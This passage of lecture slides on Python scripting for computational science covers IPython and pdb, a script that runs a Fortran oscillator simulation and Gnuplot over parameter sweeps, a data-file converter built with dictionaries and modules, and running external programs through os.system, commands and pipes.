Out[6]:0.93203908596722629

In [7]:_ + 1
Out[7]:1.93203908596722629



TAB completion

IPython supports TAB completion: write a part of a command or name (variable, function, module), hit the TAB key, and IPython will complete the word or show different alternatives:
In [1]: import math

In [2]: math.<TABKEY>
math.__class__         math.__str__           math.frexp
math.__delattr__       math.acos              math.hypot
math.__dict__          math.asin              math.ldexp
...
or
In [2]: my_variable_with_a_very_long_name = True

In [3]: my<TABKEY>
In [3]: my_variable_with_a_very_long_name
You can increase your typing speed with TAB completion!



More examples

In [1]:f = open('datafile', 'r')

IOError: [Errno 2] No such file or directory: 'datafile'

In [2]:f = open('.datatrans_infile', 'r')

In [3]:from py4cs.filetable import read_columns

In [4]:x, y = read_columns(f)

In [5]:x
Out[5]:array([ 0.1,  0.2,  0.3,  0.4])

In [6]:y
Out[6]:array([ 1.1    ,  1.8    ,  2.22222,  1.8    ])



IPython and the Python debugger

Scripts can be run from IPython:
In [1]:run scriptfile arg1 arg2 ...
e.g.,
In [1]:run datatrans2.py .datatrans_infile tmp1
IPython is integrated with Python's pdb debugger
pdb can be automatically invoked when an exception occurs:
In [29]:%pdb on  # invoke pdb automatically
In [30]:run datatrans2.py infile tmp2



More on debugging

This happens when the infile name is wrong:
/home/work/scripting/src/py/intro/datatrans2.py
      7     print "Usage:",sys.argv[0], "infile outfile"; sys.exit(1)
      8
----> 9 ifile = open(infilename, 'r')  # open file for reading
     10 lines = ifile.readlines()      # read file into list of lines
     11 ifile.close()

IOError: [Errno 2] No such file or directory: 'infile'
> /home/work/scripting/src/py/intro/datatrans2.py(9)?()
-> ifile = open(infilename, 'r')  # open file for reading
(Pdb) print infilename
infile



On the efficiency of scripts

Consider datatrans1.py: read 100 000 (x,y) data from file and write (x,f(y)) out again

Pure Python: 4s
Pure Perl: 3s
Pure Tcl: 11s
Pure C (fscanf/fprintf): 1s
Pure C++ (iostream): 3.6s
Pure C++ (buffered streams): 2.5s
Numerical Python modules: 2.2s (!)
(Computer: IBM X30, 1.2 GHz, 512 Mb RAM, Linux, gcc 3.3)



Remarks

The results reflect general trends:

Perl is up to twice as fast as Python
Tcl is significantly slower than Python
C and C++ are not that much faster
Special Python modules enable the speed of C/C++
Unfair test?
scripts use split on each line,
C/C++ reads numbers consecutively
100 000 data points would be stored in binary format in a real application, resulting in much smaller differences between the implementations



The classical script

Simple, classical Unix shell scripts are widely used to replace sequences of operating system commands
Typical application in numerical simulation:

run a simulation program
run a visualization program and produce graphs
Programs are supposed to run in batch
We want to make such a gluing script in Python



What to learn

Parsing command-line options:
 
somescript -option1 value1 -option2 value2
Removing and creating directories
Writing data to file
Running applications (stand-alone programs)



Simulation example

Code: oscillator (written in Fortran 77)



Usage of the simulation code

Input: m, b, c, and so on read from standard input
How to run the code:
oscillator < file
where file can be
3.0
0.04
1.0
...
(i.e., values of m, b, c, etc.)
Results (t, y(t)) in sim.dat



A plot of the solution



Plotting graphs in Gnuplot

Commands:
set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...';

# screen plot: (x,y) data are in the file sim.dat
plot 'sim.dat' title 'y(t)' with lines;

# hardcopies:
set size ratio 0.3 1.5, 1.0;  
set term postscript eps mono dashed 'Times-Roman' 28;
set output 'case.ps';
plot 'sim.dat' title 'y(t)' with lines;

# make a plot in PNG format as well:
set term png small;
set output 'case.png';
plot 'sim.dat' title 'y(t)' with lines;
Commands can be given interactively or put in a file



Typical manual work

Change oscillating system parameters by editing the simulator input file
Run simulator:
oscillator < inputfile
Plot:
gnuplot -persist -geometry 800x200 case.gp
Plot annotations must be consistent with inputfile
Let's automate!



Deciding on the script's interface

Usage:
./simviz1.py -m 3.2 -b 0.9 -dt 0.01 -case run1
Sensible default values for all options
Put simulation and plot files in a subdirectory
(specified by -case run1)
File: src/py/intro/simviz1.py



The script's task

Set default values of m, b, c etc.
Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc.
Create and move to subdirectory
Write input file for the simulator
Run simulator
Write Gnuplot commands in a file
Run Gnuplot



Parsing command-line options

Set default values of the script's input parameters:
m = 1.0; b = 0.7; c = 5.0; func = 'y'; A = 5.0; 
w = 2*math.pi; y0 = 0.2; tstop = 30.0; dt = 0.05; 
case = 'tmp1'; screenplot = 1
Examine command-line options in sys.argv:
# read variables from the command line, one by one:
while len(sys.argv) >= 2:
    option = sys.argv[1];       del sys.argv[1]
    if   option == '-m':
        m = float(sys.argv[1]); del sys.argv[1]
    ...
Note: sys.argv[1] is text, but we may want a float for numerical operations
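The elided branches of the loop repeat the same pattern for every option. A minimal sketch in Python 3 syntax (the slides use Python 2), assuming a hypothetical helper parse_options that keeps the parameters in a dictionary and works on a copy of the argument list instead of deleting items from sys.argv:

```python
import math

def parse_options(argv):
    """Parse '-option value' pairs from argv (argv[0] is the script name)."""
    # default values, as on the slide
    prm = {'m': 1.0, 'b': 0.7, 'c': 5.0, 'func': 'y', 'A': 5.0,
           'w': 2*math.pi, 'y0': 0.2, 'tstop': 30.0, 'dt': 0.05,
           'case': 'tmp1'}
    text_options = ('func', 'case')   # values that stay strings
    args = list(argv[1:])             # work on a copy, leave argv untouched
    while args:
        option = args.pop(0)
        name = option[1:]             # strip the leading hyphen
        if not option.startswith('-') or name not in prm:
            raise ValueError('invalid option: %s' % option)
        value = args.pop(0)           # IndexError if the value is missing
        prm[name] = value if name in text_options else float(value)
    return prm

prm = parse_options(['simviz1.py', '-m', '3.2', '-dt', '0.01', '-case', 'run1'])
```

Unknown options raise ValueError here; the real script may choose to print a message and exit instead.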



Modules for parsing command-line arguments

Python offers two modules for command-line argument parsing: getopt and optparse
These accept short options (-m) and long options (--mass)
getopt examines the command line and returns pairs of options and values, e.g. ('--mass', '2.3'); the values are strings
optparse is a bit more comprehensive to use and makes the command-line options available as attributes in an object
See exercises for extending simviz1.py with (e.g.) getopt
In this introductory example we rely on manual parsing since this exemplifies basic Python programming
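For comparison with the manual loop, here is a small getopt sketch in Python 3 syntax. The function name parse_with_getopt and the long option names --mass and --damping are assumptions chosen for illustration; only two of the parameters are handled:

```python
import getopt

def parse_with_getopt(args):
    """Return (m, b) parsed from a list like ['-m', '2.3', '--damping', '0.1']."""
    m = 1.0; b = 0.7                      # default values
    # 'm:b:' means that -m and -b each take a value;
    # the trailing '=' does the same for the long options
    options, rest = getopt.getopt(args, 'm:b:', ['mass=', 'damping='])
    for option, value in options:         # value is always a string
        if option in ('-m', '--mass'):
            m = float(value)
        elif option in ('-b', '--damping'):
            b = float(value)
    return m, b

m, b = parse_with_getopt(['--mass', '2.3', '-b', '0.1'])
```

In a script one would pass sys.argv[1:] as args; unknown options make getopt raise getopt.GetoptError.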



Creating a subdirectory

Python has a rich cross-platform operating system (OS) interface
Skip Unix- or DOS-specific commands;
do all OS operations in Python!
Safe creation of a subdirectory:
dir = case              # subdirectory name
import os, shutil
if os.path.isdir(dir):  # does dir exist?
    shutil.rmtree(dir)  # yes, remove old files
os.mkdir(dir)           # make dir directory
os.chdir(dir)           # move to dir
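The same steps can be wrapped in a function and tried out safely in a temporary directory. This is a sketch with a hypothetical helper name, make_clean_dir; it leaves out the os.chdir call so that the caller's working directory is not changed:

```python
import os, shutil, tempfile

def make_clean_dir(path):
    """Create path as an empty directory, removing any old version first."""
    if os.path.isdir(path):
        shutil.rmtree(path)     # remove the directory and all its files
    os.mkdir(path)

# demonstration inside a temporary parent directory
parent = tempfile.mkdtemp()
case_dir = os.path.join(parent, 'tmp1')
make_clean_dir(case_dir)
open(os.path.join(case_dir, 'old.dat'), 'w').close()   # leftover from an "old run"
make_clean_dir(case_dir)                               # old files are gone now
remaining = os.listdir(case_dir)
shutil.rmtree(parent)                                  # clean up the demo
```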



Writing the input file to the simulator

f = open('%s.i' % case, 'w')
f.write("""
        %(m)g
        %(b)g
        %(c)g
        %(func)s
        %(A)g
        %(w)g
        %(y0)g
        %(tstop)g
        %(dt)g
        """ % vars())
f.close()
Note: triple-quoted string for multi-line output
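The %(name)g syntax looks up each name as a key in the dictionary given after the % operator, and vars() is a dictionary of the variables currently defined. A small sketch (Python 3 syntax, with only three of the parameters) showing that an explicit dictionary works the same way:

```python
m = 3.2; b = 0.9; func = 'y'

# vars() maps variable names to their values, so %(m)g picks up m
text = """%(m)g
%(b)g
%(func)s
""" % vars()

# any dictionary with the right keys can be used instead of vars()
other = '%(m)g %(func)s' % {'m': 0.5, 'func': 'siny'}
```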



Running the simulation

Stand-alone programs can be run as
os.system(command)

# examples:
os.system('myprog < input_file')
os.system('ls *')  # bad, Unix-specific
Better: get failure status and output from the command
cmd = 'oscillator < %s.i' % case  # command to run
import commands
failure, output = commands.getstatusoutput(cmd)
if failure:
    print 'running the oscillator code failed'
    print output
    sys.exit(1)
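Note for newer Python versions: the commands module exists only in Python 2. In Python 3 the same function is available as subprocess.getstatusoutput. A minimal sketch, using echo as a stand-in for the oscillator program and a hypothetical wrapper named run:

```python
import subprocess

def run(cmd):
    """Run cmd in a shell; return (failure, output) as getstatusoutput does."""
    failure, output = subprocess.getstatusoutput(cmd)
    if failure:
        print('running %r failed' % cmd)
        print(output)
    return failure, output

failure, output = run('echo hello')       # stand-in for 'oscillator < case.i'
bad_failure, bad_output = run('exit 3')   # a command that reports failure
```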



Making plots

Make Gnuplot script:
f = open(case + '.gnuplot', 'w')
f.write("""
set title '%s: m=%g b=%g c=%g f(y)=%s A=%g ...';
...
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
...
f.close()
Run Gnuplot:
cmd = 'gnuplot -geometry 800x200 -persist ' \
      + case + '.gnuplot'
failure, output = commands.getstatusoutput(cmd)
if failure:
    print 'running gnuplot failed'; print output; sys.exit(1)



Python vs Unix shell script

A script like simviz1.py is traditionally written as a Unix shell script
What are the advantages of using Python here?

Easier command-line parsing
Runs on Windows and Mac as well as Unix
Easier extensions (loops, storing data in arrays etc)
Shell script file: src/bash/simviz1.sh



Other programs for curve plotting

It is easy to replace Gnuplot by another plotting program
Matlab, for instance:
f = open(case + '.m', 'w')  # write to Matlab M-file
# (the character % must be written as %% in printf-like strings)
f.write("""
load sim.dat              %% read sim.dat into sim matrix
plot(sim(:,1),sim(:,2))   %% plot 1st column as x, 2nd as y
legend('y(t)')
title('%s: m=%g b=%g c=%g f(y)=%s A=%g w=%g y0=%g dt=%g')
outfile = '%s.ps';  print('-dps',  outfile)  %% ps BW plot
outfile = '%s.png'; print('-dpng', outfile)  %% png color plot
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
if screenplot: f.write('pause(30)\n')
f.write('exit\n'); f.close()

if screenplot:
    cmd = 'matlab -nodesktop -r ' + case + ' > /dev/null &'
else:
    cmd = 'matlab -nodisplay -nojvm -r ' + case
failure, output = commands.getstatusoutput(cmd)



Series of numerical experiments

Suppose we want to run a series of experiments with different m values
Put a script on top of simviz1.py,
./loop4simviz1.py m_min m_max dm \
                  [options as for simviz1.py]
having a loop over m and calling simviz1.py inside the loop
Each experiment is archived in a separate directory
That is, loop4simviz1.py controls the -m and -case options to simviz1.py



Handling command-line args (1)

The first three arguments define the m values:
try:
    m_min = float(sys.argv[1])
    m_max = float(sys.argv[2])
    dm    = float(sys.argv[3])
except:
    print 'Usage:',sys.argv[0],\
    'm_min m_max m_increment [ simviz1.py options ]'
    sys.exit(1)
Pass the rest of the arguments, sys.argv[4:], to simviz1.py
Problem: sys.argv[4:] is a list, we need a string
['-b','5','-c','1.1'] -> '-b 5 -c 1.1'



Handling command-line args (2)

' '.join(list) can make a string out of the list list, with a blank between each item
simviz1_options = ' '.join(sys.argv[4:])
Example:
./loop4simviz1.py 0.5 2 0.5 -b 2.1 -A  3.6
results in
m_min:  0.5
m_max:  2.0
dm:     0.5
simviz1_options = '-b 2.1 -A 3.6'



The loop over m

Cannot use
for m in range(m_min, m_max, dm):
because range works with integers only
A while-loop is appropriate:
m = m_min
while m <= m_max:
    case = 'tmp_m_%g' % m
    s = 'python simviz1.py %s -m %g -case %s' % \
        (simviz1_options,m,case)
    failure, output = commands.getstatusoutput(s)
    m += dm
(Note: our -m and -case will override any -m or -case option provided by the user)
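One caveat with the while loop: repeated m += dm accumulates round-off errors, so the final value may land slightly above m_max and the last experiment is then skipped (for instance, 0.1 + 0.1 + 0.1 evaluates to 0.30000000000000004, which is greater than 0.3). A possible remedy, sketched here with a hypothetical helper frange and an arbitrarily chosen tolerance, is to compute the number of steps first and loop over integers:

```python
def frange(start, stop, step):
    """Return [start, start+step, ...], including stop if it is hit
    within a small tolerance. Assumes step > 0 and stop >= start."""
    n = int((stop - start)/step + 1e-9)   # number of whole steps
    return [start + i*step for i in range(n + 1)]

m_values = frange(0.5, 2, 0.5)

# the naive accumulation misses the end point in this case
m = 0.1; naive = []
while m <= 0.3:
    naive.append(m)
    m += 0.1
```

Each value from frange is computed from the start value with a single multiplication and addition, so errors do not build up over the loop.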



Collecting plots in an HTML file

Many runs can be handled; need a way to browse the results
Idea: collect all plots in a common HTML file:
html = open('tmp_mruns.html', 'w')
html.write('<HTML><BODY BGCOLOR="white">\n')

m = m_min
while m <= m_max:
    case = 'tmp_m_%g' % m
    cmd = 'python simviz1.py %s -m %g -case %s' % \
          (simviz1_options, m, case)
    failure, output = commands.getstatusoutput(cmd)
    html.write('<H1>m=%g</H1> <IMG SRC="%s">\n' \
         % (m,os.path.join(case,case+'.png')))
    m += dm
html.write('</BODY></HTML>\n')



Collecting plots in a PostScript file

For compact printing a PostScript file with small-sized versions of all the plots is useful
epsmerge (Perl script) is an appropriate tool:
# concatenate file1.ps, file2.ps, and so on to 
# one single file figs.ps, having pages with 
# 3 rows with 2 plots in each row (-par preserves 
# the aspect ratio of the plots)

epsmerge -o figs.ps -x 2 -y 3 -par \
         file1.ps file2.ps file3.ps ...
Can use this technique to make a compact report of the generated PostScript files for easy printing



Implementation of ps-file report

psfiles = []  # plot files in PostScript format
...
while m <= m_max:
    case = 'tmp_m_%g' % m
    ...
    psfiles.append(os.path.join(case,case+'.ps'))
    ...
...
s = 'epsmerge -o tmp_mruns.ps -x 2 -y 3 -par ' + \
    ' '.join(psfiles)
failure, output = commands.getstatusoutput(s)



Animated GIF file

When we vary m, wouldn't it be nice to see progressive plots put together in a movie?
Can combine the PNG files together in an animated GIF file:
convert -delay 50 -loop 1000 -crop 0x0 \
        plot1.png plot2.png plot3.png plot4.png ...  movie.gif

animate movie.gif  # or display movie.gif
(convert and animate are ImageMagick tools)
Collect all PNG filenames in a list and join the list items (as in the generation of the ps-file report)



Some improvements

Enable loops over an arbitrary parameter (not only m)
# easy:
'-m %g' % m
# is replaced with
'-%s %s' % (str(prm_name), str(prm_value))
# prm_value plays the role of the m variable
# prm_name ('m', 'b', 'c', ...) is read as input
Keep the range of the y axis fixed (for movie)
Files:
simviz1.py  : run simulation and visualization
simviz2.py  : additional option for yaxis scale

loop4simviz1.py : m loop calling simviz1.py
loop4simviz2.py : loop over any parameter in
                  simviz2.py and make movie



Playing around with experiments

We can perform lots of different experiments:

Study the impact of increasing the mass:
./loop4simviz2.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot
Study the impact of a nonlinear spring:
./loop4simviz2.py c 5 30 2 -yaxis -0.7 0.7 -b 0.5 \
                  -func siny -noscreenplot
Study the impact of increasing the damping:
./loop4simviz2.py b 0 2 0.25 -yaxis -0.5 0.5 -A 4
(loop over b, from 0 to 2 in steps of 0.25)



Remarks

Reports:
tmp_c.gif          # animated GIF (movie)
animate tmp_c.gif

tmp_c_runs.html    # browsable HTML document
tmp_c_runs.ps      # all plots in a ps-file
All experiments are archived in a directory with a filename reflecting the varying parameter:
tmp_m_2.1   tmp_b_0   tmp_c_29
All generated files/directories start with tmp so it is easy to clean up hundreds of experiments
Try the listed loop4simviz2.py commands!!



Exercise

Make a summary report with the equation, a picture of the system, the command-line arguments, and a movie of the solution
Make a link to a detailed report with plots of all the individual experiments
Demo:
./loop4simviz2_2html.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot
ls -d tmp_*
mozilla tmp_m_summary.html



Increased quality of scientific work

Archiving of experiments and having a system for uniquely relating input data to visualizations or result files are fundamental for reliable scientific investigations
The experiments can easily be reproduced
New (large) sets of experiments can be generated
We make tailored tools for investigating results
All these items contribute to increased quality of numerical experimentation



New example: converting data file formats

Input file with time series data:
some comment line
1.5
  measurements  model1 model2
     0.0         0.1    1.0
     0.1         0.1    0.188
     0.2         0.2    0.25
Contents: comment line, time step, headings, time series data
Goal: split file into two-column files, one for each time series
Script: interpret input file, split text, extract data and write files



Example on an output file

The model1.dat file, arising from column no 2, becomes
0    0.1
1.5  0.1
3    0.2
The time step parameter, here 1.5, is used to generate the first column



Program flow

Read inputfile name (1st command-line arg.)
Open input file
Read and skip the 1st (comment) line
Extract time step from the 2nd line
Read time series names from the 3rd line
Make a list of file objects, one for each time series
Read the rest of the file, line by line:

split lines into y values
write t and y value to file, for all series
File: src/py/intro/convert1.py



What to learn

Reading and writing files
Sublists
List of file objects
Dictionaries
Arrays of numbers
List comprehension
Refactoring a flat script as functions in a module



Reading in the first 3 lines

Open file and read comment line:
infilename = sys.argv[1]
ifile = open(infilename, 'r') # open for reading
line = ifile.readline()
Read time step from the next line:
dt = float(ifile.readline())
Read next line containing the curvenames:
ynames = ifile.readline().split()



Output to many files

Make a list of file objects for output of each time series:
outfiles = []
for name in ynames:
    outfiles.append(open(name + '.dat', 'w'))



Writing output

Read each line, split into y values, write to output files:
t = 0.0    # t value
# read the rest of the file line by line:
while 1:
    line = ifile.readline()
    if not line: break

    yvalues = line.split()

    # skip blank lines:
    if len(yvalues) == 0: continue  

    for i in range(len(outfiles)):
        outfiles[i].write('%12g %12.5e\n' % \
                          (t, float(yvalues[i])))
    t += dt

for file in outfiles:  
    file.close()



Dictionaries

Dictionary = array with a text as index
Also called hash or associative array in other languages
Can store 'anything':
prm['damping'] = 0.2             # number

def x3(x): 
    return x*x*x
prm['stiffness'] = x3            # function object

prm['model1'] = [1.2, 1.5, 0.1]  # list object
The text index is called key



Dictionaries for our application

Could store the time series in memory as a dictionary of lists; the list items are the y values and the y names are the keys
y = {}           # declare empty dictionary
# ynames: names of y curves
for name in ynames:
    y[name] = [] # for each key, make empty list

lines = ifile.readlines()  # list of all lines
...
for line in lines[3:]:
    yvalues = [float(x) for x in line.split()]
    i = 0  # counter for yvalues
    for name in ynames:
        y[name].append(yvalues[i]); i += 1
File: src/py/intro/convert2.py



Dissection of the previous slide

Specifying a sublist, e.g., the 4th line until the last line: lines[3:]
Transforming all words in a line to floats:
yvalues = [float(x) for x in line.split()]

# same as
numbers = line.split()
yvalues = []
for s in numbers:
    yvalues.append(float(s))



The items in a dictionary

The input file
some comment line
1.5
  measurements  model1 model2
     0.0         0.1    1.0
     0.1         0.1    0.188
     0.2         0.2    0.25
results in the following y dictionary:
'measurements': [0.0, 0.1, 0.2], 
'model1':       [0.1, 0.1, 0.2], 
'model2':       [1.0, 0.188, 0.25]
(this output is plain print: print y)
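The result can be checked without any file by applying the same logic to the sample text held in a string. This is a sketch in Python 3 syntax; the variable text and the list t of time values are introduced here for illustration only:

```python
text = """some comment line
1.5
  measurements  model1 model2
     0.0         0.1    1.0
     0.1         0.1    0.188
     0.2         0.2    0.25
"""
lines = text.splitlines()
dt = float(lines[1])                  # time step on the 2nd line
ynames = lines[2].split()             # curve names on the 3rd line
y = {name: [] for name in ynames}     # dictionary of empty lists
for line in lines[3:]:
    yvalues = [float(x) for x in line.split()]
    for name, value in zip(ynames, yvalues):
        y[name].append(value)

# the time values written to the first column of each output file
t = [k*dt for k in range(len(y['model1']))]
```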



Remarks

Fortran/C programmers tend to think of indices as integers
Scripters make heavy use of dictionaries and text-type indices (keys)
Python dictionaries can use (almost) any object as key (!)
A dictionary is also often called hash (e.g. in Perl) or associative array
Examples will demonstrate their use



Next step: make the script reusable

The previous script is ``flat''
(start at top, run to bottom)
Parts of it may be reusable
We may like to load data from file, operate on data, and then dump data
Let's refactor the script:

make a load data function
make a dump data function
collect these two functions in a reusable module



The load data function

def load_data(filename):
    f = open(filename, 'r'); lines = f.readlines(); f.close()
    dt = float(lines[1])
    ynames = lines[2].split()
    y = {}
    for name in ynames:  # make y a dictionary of (empty) lists
        y[name] = []

    for line in lines[3:]:
        yvalues = [float(yi) for yi in line.split()]
        if len(yvalues) == 0: continue  # skip blank lines
        for name, value in zip(ynames, yvalues):
            y[name].append(value)
    return y, dt



How to call the load data function

Note: the function returns two (!) values;
a dictionary of lists, plus a float
It is common that output data from a Python function are returned, and multiple data structures can be returned (actually packed as a tuple, a kind of ``constant list'')
Here is how the function is called:
y, dt = load_data('somedatafile.dat')
print y
Output from print y:
>>> y
{'tmp-model2': [1.0, 0.188, 0.25], 
'tmp-model1': [0.10000000000000001, 0.10000000000000001, 
               0.20000000000000001], 
'tmp-measurements': [0.0, 0.10000000000000001, 0.20000000000000001]}



Iterating over several lists

C/C++/Java/Fortran-like iteration over two arrays/lists:
for i in range(len(list1)):
    e1 = list1[i];  e2 = list2[i]
    # work with e1 and e2
Pythonic version:
for e1, e2 in zip(list1, list2):
    # work with element e1 from list1 and e2 from list2
For example,
for name, value in zip(ynames, yvalues):
    y[name].append(value)
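A detail worth knowing is that zip stops at the end of the shortest list, so a missing value goes unnoticed rather than causing an error. A short sketch in Python 3 syntax, where zip returns an iterator and is wrapped in list to show the pairs:

```python
ynames = ['measurements', 'model1', 'model2']
yvalues = [0.0, 0.1, 1.0]

y = {name: [] for name in ynames}
for name, value in zip(ynames, yvalues):
    y[name].append(value)

# lists of unequal length: the extra item 3 is silently dropped
pairs = list(zip([1, 2, 3], ['a', 'b']))
```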



The dump data function

def dump_data(y, dt):
    # write out 2-column files with t and y[name] for each name:
    for name in y.keys():
        ofile = open(name+'.dat', 'w')
        for k in range(len(y[name])):
            ofile.write('%12g %12.5e\n' % (k*dt, y[name][k]))
        ofile.close()



Reusing the functions

Our goal is to reuse load_data and dump_data, possibly with some operations on y in between:
from convert3 import load_data, dump_data

y, timestep = load_data('.convert_infile1')

from math import fabs
for name in y:  # run through keys in y
    maxabsy = max([fabs(yval) for yval in y[name]])
    print 'max abs(y[%s](t)) = %g' % (name, maxabsy)

dump_data(y, timestep)
Then we need to make a module convert3!



How to make a module

Collect the functions in the module in a file, here the file is called convert3.py
We have then made a module convert3
The usage is as exemplified on the previous slide



Module with application script

The scripts convert1.py and convert2.py load and dump data - this functionality can be reproduced by an application script using convert3
The application script can be included in the module:
if __name__ == '__main__':
    import sys
    try:     
        infilename = sys.argv[1]
    except:  
        usage = 'Usage: %s infile' % sys.argv[0]
        print usage; sys.exit(1)
    y, dt = load_data(infilename)
    dump_data(y, dt)
If the module file is run as a script, the if test is true and the application script is run
If the module is imported in a script, the if test is false and no statements are executed



Usage of convert3.py

As script:
unix> ./convert3.py someinputfile.dat
As module:
import convert3
y, dt = convert3.load_data('someinputfile.dat')
# do more with y?
convert3.dump_data(y, dt)
The application script at the end also serves as an example of how to use the module



How to solve exercises

Construct an example on the functionality of the script, if that is not included in the problem description
Write very high-level pseudo code with words
Scan known examples for constructions and functionality that can come into use
Look up man pages, reference manuals, FAQs, or textbooks for functionality you have minor familiarity with, or to clarify syntax details
Search the Internet if the documentation from the latter point does not provide sufficient answers



Example: write a join function

Exercise:
Write a function myjoin that concatenates a list of strings to a single string, with a specified delimiter between the list elements. That is, myjoin is supposed to be an implementation of a string's join method in terms of basic string operations.
Functionality:
s = myjoin(['s1', 's2', 's3'], '*')
# s becomes 's1*s2*s3'



The next steps

Pseudo code:
function myjoin(list, delimiter)
  joined = first element in list
  for element in rest of list:
    concatenate joined, delimiter and element
  return joined
Known examples: string concatenation (+ operator) from hw.py, list indexing (list[0]) from datatrans1.py, sublist extraction (list[1:]) from convert1.py, function construction from datatrans1.py



Refined pseudo code

def myjoin(list, delimiter):
  joined = list[0]
  for element in list[1:]:
    joined += delimiter + element
  return joined
That's it!
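One case the code above does not handle is an empty list, where list[0] raises an IndexError. A sketch of a variant that returns an empty string in that case, as a string's join method does; the argument is renamed to strings here to avoid shadowing the built-in name list:

```python
def myjoin(strings, delimiter):
    """Concatenate the items in strings with delimiter in between."""
    if not strings:              # empty list: nothing to join
        return ''
    joined = strings[0]
    for element in strings[1:]:
        joined += delimiter + element
    return joined

s = myjoin(['s1', 's2', 's3'], '*')
```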



How to present the answer to an exercise

Use comments to explain ideas
Use descriptive variable names to reduce the need for more comments
Find generic solutions (unless the code size explodes)
Strive for compact code, but not too compact
Invoke the Python interpreter and run import this
Always construct a running example that demonstrates the script, and include it in the source code file inside a triple-quoted string:
"""
unix> python hw.py 3.1459
Hello, World! sin(3.1459)=-0.00430733309102
"""



How to print exercises with a2ps

Here is a suitable command for printing exercises for a week:
unix> a2ps --line-numbers=1 -4 -o outputfile.ps *.py
This prints all *.py files, with 4 (because of -4) pages per sheet
See man a2ps for more info about this command
In every exercise you also need examples on how a script is run and what the output is -- one recommendation is to put all this info (cut from the terminal window and pasted in your editor) in a triple double quoted Python string (such a string can be viewed as example/documentation/comment as it does not affect the behavior of the script)





Frequently encountered tasks in Python




Overview

running an application
file reading and writing
list and dictionary operations
splitting and joining text
basics of Python classes
writing functions
file globbing, testing file types
copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories
directory tree traversal
parsing command-line arguments



Python programming information

Man-page oriented information:

pydoc somemodule.somefunc, pydoc somemodule
doc.html! Links to lots of electronic information
The Python Library Reference (go to the index)
Python in a Nutshell
Beazley's Python reference book
Your favorite Python language book
Google
These slides (and exercises) are closely linked to the ``Python scripting for computational science'' book, ch. 3 and 8



Demo of the result of Python statements

We frequently illustrate Python constructions in the interactive shell
Recommended shells: IDLE or IPython
Examples (using standard prompt, not default IPython look):
>>> t = 0.1
>>> def f(x):
...     return math.sin(x)
...
>>> f(t)
0.099833416646828155
>>> os.path.splitext('/some/long/path/myfile.dat')
('/some/long/path/myfile', '.dat')
Help in the shell:
>>> help(os.path.splitext)



Preprocessor

  • C and C++ programmers heavily utilize the ``C preprocessor'' for including files, excluding code blocks, defining constants, etc.

  • preprocess is a (Python!) program that provides (most) ``C preprocessor'' functionality for Python, Perl, Ruby, shell scripts, makefiles, HTML, Java, JavaScript, PHP, Fortran, C, C++, ... (!)

  • preprocess directives are typeset within comments

  • Most important directives: include, if/ifdef/ifndef/else/endif, define

  • See pydoc preprocess for documentation
    # #if defined('DEBUG') and DEBUG >= 2
    # write out debug info at level 2:
    ...
    # #elif DEBUG == 0
    # write out minimal debug info:
    ...
    # #else
    # no debug output
    # #endif
    
    preprocess -DDEBUG=1 pyscript.p.py > pyscript.py

  • preprocess cannot do macros with arguments



    How to use the preprocessor

  • Include documentation or common code snippets in several files
    #  #include "myfile.py"
    

  • Exclude/include code snippets according to a variable (its value, or just whether the variable is defined)
    # #ifdef MyDEBUG
    ....debug code....
    # #endif
    

  • Define variables with optional value
    # #define MyDEBUG
    
    # #define MyDEBUG 2
    
    Such preprocessor variables can also be defined on the command line
    preprocess -DMyDEBUG=2 myscript.p.py > myscript.py
    

  • Naming convention: .p.py files are input



    Running an application

    Run a stand-alone program:
    cmd = 'myprog -c file.1 -p -f -q > res'
    failure = os.system(cmd)
    if failure:
      print '%s: running myprog failed' % sys.argv[0]
      sys.exit(1)
    
    Redirect output from the application to a list of lines:
    pipe = os.popen(cmd)
    output = pipe.readlines()
    pipe.close()
    
    for line in output:
      # process line
    

  • Better tool: the commands module (next slide)



    Running applications and grabbing the output

    Best way to execute another program:
    import commands
    failure, output = commands.getstatusoutput(cmd)
    
    if failure:
        print 'Could not run', cmd; sys.exit(1)
    
    for line in output.splitlines():  # or output.split('\n')
        # process line
    
    (output holds the output as a string)
    output holds both standard error and standard output
    (os.popen grabs only standard output so you do not see error messages)



    Running applications in the background

    os.system, pipes, and commands.getstatusoutput return only after the command has terminated
    There are two methods for running the script in parallel with the command:

    run the command in the background
    Unix:     add an ampersand (&) at the end of the command
    Windows:  run the command with the 'start' program
    
    run the operating system command in a separate thread
    More info: see ``Platform-dependent operations'' slide and the threading module
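A third possibility in newer Python versions, not covered on the slide, is subprocess.Popen, which starts the command and returns immediately on both Unix and Windows. A minimal sketch in Python 3 syntax, where the child process is just another Python interpreter that sleeps briefly, as a stand-in for a real application:

```python
import subprocess, sys

# start the child without waiting for it to finish
child = subprocess.Popen(
    [sys.executable, '-c', 'import time; time.sleep(0.2)'])

# poll() returns None as long as the child is still running
still_running = child.poll() is None

# ... the script can do other work here ...

exit_status = child.wait()   # block until the child has terminated
```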



    Pipes

    Open (in a script) a dialog with an interactive program:
    gnuplot = os.popen('gnuplot -persist', 'w')
    gnuplot.write("""
    set xrange [0:10]; set yrange [-2:2]
    plot sin(x)
    quit
    """)
    gnuplot.close()  # gnuplot is now run with the written input
    
    Same as "here documents" in Unix shells:
    gnuplot <<EOF
    set xrange [0:10]; set yrange [-2:2]
    plot sin(x)
    quit
    EOF
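In newer Python versions the same one-way dialog is usually written with the subprocess module. The sketch below (Python 3 syntax) assumes that Gnuplot may not be installed, so it feeds the commands to a stand-in child process: a Python interpreter that just counts the lines it receives on standard input:

```python
import subprocess, sys

# stand-in for an interactive program such as gnuplot
child_code = 'import sys; print(len(sys.stdin.readlines()))'
child = subprocess.Popen([sys.executable, '-c', child_code],
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=True)   # text, not bytes

# send all input, close the pipe, and collect the child's output
output, _ = child.communicate("""set xrange [0:10]; set yrange [-2:2]
plot sin(x)
quit
""")
```

With Gnuplot available, the argument list would be ['gnuplot', '-persist'] and stdout would not need to be captured.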
    



    Writing to and reading from applications

    There are popen modules that allow two-way communication with an application (read/write), but this technique is not suitable for a reliable two-way dialog (it is easy to get hang-ups)
    The pexpect module is the right tool for a two-way dialog with a stand-alone application
    # copy files to remote host via scp and password dialog
